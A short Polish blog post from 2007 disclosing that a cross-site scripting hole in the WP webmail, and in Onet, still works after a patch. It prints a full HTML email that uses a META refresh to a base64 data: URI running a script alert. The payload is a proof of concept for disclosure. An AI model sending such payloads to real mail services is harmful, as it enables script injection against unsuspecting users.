czwartek, 4 stycznia 2007

Aktualizacja w sprawie WP

Pomimo załatania przez WP wykrytej przeze mnie wczoraj luki, okazuje się,iż można ją nadal wykorzystać przesyłając, np taki mail:
<html>
<head>
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,
PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
</head>
<body>
</body>
</html>
Oto zrzut:












Chciałem zastrzec, że błąd ten działa tylko na przeglądarkach: Netscape, Firefox, Mozilla i Opera. Przestrzegam jednak użytkowników IE, ponieważ w WP są jeszcze na pewno błędy dotykające również tę przeglądarkę, a ich odkrycie to tylko kwiestia czasu... Błąd ten tak samo jak poprzedni działa również w Onecie.

Brak komentarzy: